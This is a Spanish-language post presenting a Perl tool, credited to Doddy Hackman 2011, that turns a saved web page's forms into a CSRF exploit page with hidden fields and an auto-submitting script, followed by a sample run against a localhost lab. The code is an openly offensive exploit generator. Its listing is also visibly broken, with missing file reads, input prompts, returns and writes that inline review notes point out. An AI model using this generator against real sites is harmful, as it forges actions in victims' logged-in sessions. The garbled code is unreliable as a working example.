Una herramienta simple para ahorrar trabajo en la creación de un exploit
para la vulnerabilidad Cross Site Request Forgery; después genera el resultado
en una carpeta creada por el programa, con el nombre de la web.
#!usr/bin/perl
#CSRF T00l (C) Doddy Hackman 2011
use HTML::Form;
use URI
::Split qw(uri_split
);
# Entry point: make sure the output directory exists, print the banner, then
# either analyse the file named on the command line or show the usage line.
# The footer is printed in both cases.
installer();
head();
my ($input_file) = @ARGV;
if (!$input_file) {
    sintax();
}
else {
    now($input_file);
}
copyright();
# now(FILE): list every <form> found in a saved HTML file, then write a
# stand-alone HTML page that re-submits the form picked by the operator.
# Argument: $_[0] is the path of the HTML file to analyse.
# A server that accepts the request sent by the generated page has no working
# anti-CSRF control on that form (per-request token, SameSite cookie policy,
# Origin/Referer check).
# NOTE(review): several statements this sub depends on are not visible in this
# listing (see the notes below); they were presumably lost when the page was
# extracted.
sub now {
# A missing file prints an error and the footer, but no exit/return is
# visible here, so execution carries on with the lines below.
unless(-f $_[0]) {
print "\n[-] File Not Found\n"; copyright();
}
print "\n[+] File to parse : ".$_[0]."\n\n";
# NOTE(review): no open() for the FILE handle is visible; as shown, this reads
# from a handle that was never opened.
my $words = join q(),<FILE>;
# Parse all forms in the document; "/" is passed as the base URI.
my @testar = HTML::Form->parse($words,"/");
# $count is a package variable (no `my`; no `use strict` is visible).
$count = 0;
foreach my $test(@testar) {
$count++;
# attr(name) passes a bareword as the attribute key, which only parses
# because strict is not enabled.
print "\n\n -- == Form $count == --\n\n"; if ($test->attr(name) eq "") {
print "[+] Name : No Found"."\n"; } else {
print "[+] Name : ".$test->attr(name
)."\n"; }
# The header announces Type/Name/Value, but only the value is printed on the
# visible line; the sample run on this page shows all three columns.
print "[+] Action : ".$test->action."\n"; print "[+] Method : ".$test->method."\n"; print "\n-- == Input == --\n\n"; @inputs = $test->inputs;
print "Type\t\tName\t\tValue\n"; foreach $in(@inputs) {
print $in->value."\t\t\n"; }
}
# NOTE(review): $op is never assigned in the visible code; the sample run
# shows the operator typing a form number at this prompt, so the STDIN read
# is presumably missing. Nothing checks that the number is within the range
# of parsed forms.
print "\n\n[+] Form to generate : "; if ($op ne "") {
# The operator sees 1-based form numbers; the list index is 0-based.
$op--;
my $probar = (HTML::Form->parse($words,"/"))[$op];
my $action = ver($words,$op);
# The output file name is built from the form action via nombre().
# NOTE(review): the action, method, input names and typed values all come
# from the parsed HTML or from operator input and are written into the
# markup unquoted and unescaped; the file name is not validated either.
my $fin = nombre($action).".html";
savefile("<form action=$action method=".$probar->method." name=exploit>",$fin);
@input = $probar->inputs;
# One hidden field per input of the chosen form, with an operator-typed value.
foreach $in(@input) {
print "\n[+] Value of the ".$in->name." : "; chomp(my $val = <stdin>); savefile("<input type=hidden name=".$in->name." value=".$val.">",$fin);
}
# Closing markup: a script function that submits the form named "exploit",
# attached to an iframe's onmouseover handler.
# NOTE(review): "height=%6" looks like a typo for "6%", and the message below
# prints "logscsrf/" while the directory used elsewhere is "logs_csrf/".
my $final = "</form><script language=javascript>function colocar(){document.exploit.submit()}
</script><iframe width=6% height=%6 overflow=hidden onmouseover=javascript:colocar()>
";
savefile($final,$fin);
print "\n\n[+] CSRF Exploit Generated\n\n"; print "[+] To can see in logscsrf/".$fin."\n\n"; }
}
# ver(HTML, INDEX): look up the action of the form at 0-based INDEX in the
# HTML text, asking the operator for one when the form has none.
# Arguments: $_[0] is the HTML document text, $_[1] the form index.
# NOTE(review): no return statement is visible, and the else branch is empty,
# so as shown the caller does not receive the action string; the original
# presumably returned it.
sub ver {
my $probar = (HTML::Form->parse($_[0],"/"))[$_[1]];
my $action = $probar->action;
# $co copies the action but is not used in the visible code.
my $co = $action;
# An empty action or the bare base "/" means the page gave no usable target.
if ($action eq "" or $action eq "/"){
# `my $action` here declares a new variable scoped to this block; the
# outer $action is left unchanged.
print "\n\n[+] Action : "; chomp(my $action = <stdin>); } else {
}
}
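# installer(): create the output directory "logs_csrf/" on first run.
# Takes no arguments; the return value is not used by the caller.
sub installer {
    my $log_dir = "logs_csrf/";
    return if -d $log_dir;

    # The mode must be an octal number: the string "777" is read as decimal
    # 777 (octal 1411), which does not even give the owner write access.
    # 0700 keeps the generated files private to the user running the tool.
    mkdir($log_dir, 0700)
        or warn "[-] Cannot create $log_dir: $!\n";
    return;
}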
# nombre(URL): split a URL into its five components with URI::Split.
# Argument: $_[0] is the URL (the caller passes a form action).
# NOTE(review): no return statement is visible. The caller concatenates the
# result with ".html", so as shown it gets whatever the list assignment
# yields in scalar context rather than a host name; the sample run on this
# page produces "localhost.html", so a line returning the authority part
# ($auth) was presumably lost.
# NOTE(review): the result becomes a file name and originates in parsed HTML
# or operator input; it should be restricted to a safe basename before use.
sub nombre {
my ($scheme, $auth, $path, $query, $frag) = uri_split($_[0]);
}
# savefile(TEXT, NAME): open logs_csrf/NAME for appending.
# Arguments: $_[0] is the text to store, $_[1] the file name inside logs_csrf/.
# NOTE(review): only the open() is visible; $_[0] is never written and the
# handle is never closed in this listing, so those lines were presumably lost.
# NOTE(review): this is a two-argument open on a bareword handle with the
# file name concatenated into the mode string, and its result is not checked.
# A three-argument open with a lexical handle and an error check is the safer
# form, and NAME should be validated (no path separators or "..") because it
# is derived from the analysed page.
sub savefile {
open (SAVE
,">>logs_csrf/".$_[1]); }
# sintax(): print the one-line usage message; $0 is the script name as invoked.
sub sintax {
    my $usage_line = "\n[+] sintax : $0 <file>\n";
    print $usage_line;
}
# head(): print the tool banner.
sub head {
    my $banner = "\n\n -- == CSRF T00l == --\n\n";
    print $banner;
}
# copyright(): print the author footer.
sub copyright {
    my $footer = "\n\n -- == Doddy Hackman 2011 == --\n\n";
    print $footer;
}
# ¿ The End ?
Ejemplo de uso
C:\Documents and Settings\Administrador\Escritorio\Leviatan\Hacking\WarFactoy II
Finales\CSRF Tool>tool.pl read.txt
-- == CSRF T00l == --
[+] File to parse : read.txt
-- == Form 1 == --
[+] Name : No Found
[+] Action : http://localhost/labs/csrf/csrf.php
[+] Method : GET
-- == Input == --
Type Name Value
text ver
password veras
submit control Agregar
-- == Form 2 == --
[+] Name : No Found
[+] Action : /
[+] Method : POST
-- == Input == --
Type Name Value
text ac
submit ee aaa
[+] Form to generate : 1
[+] Value of the ver : aaa
[+] Value of the veras : aaa
[+] Value of the control : aaa
[+] CSRF Exploit Generated
[+] To can see in logscsrf/localhost.html
-- == Doddy Hackman 2011 == --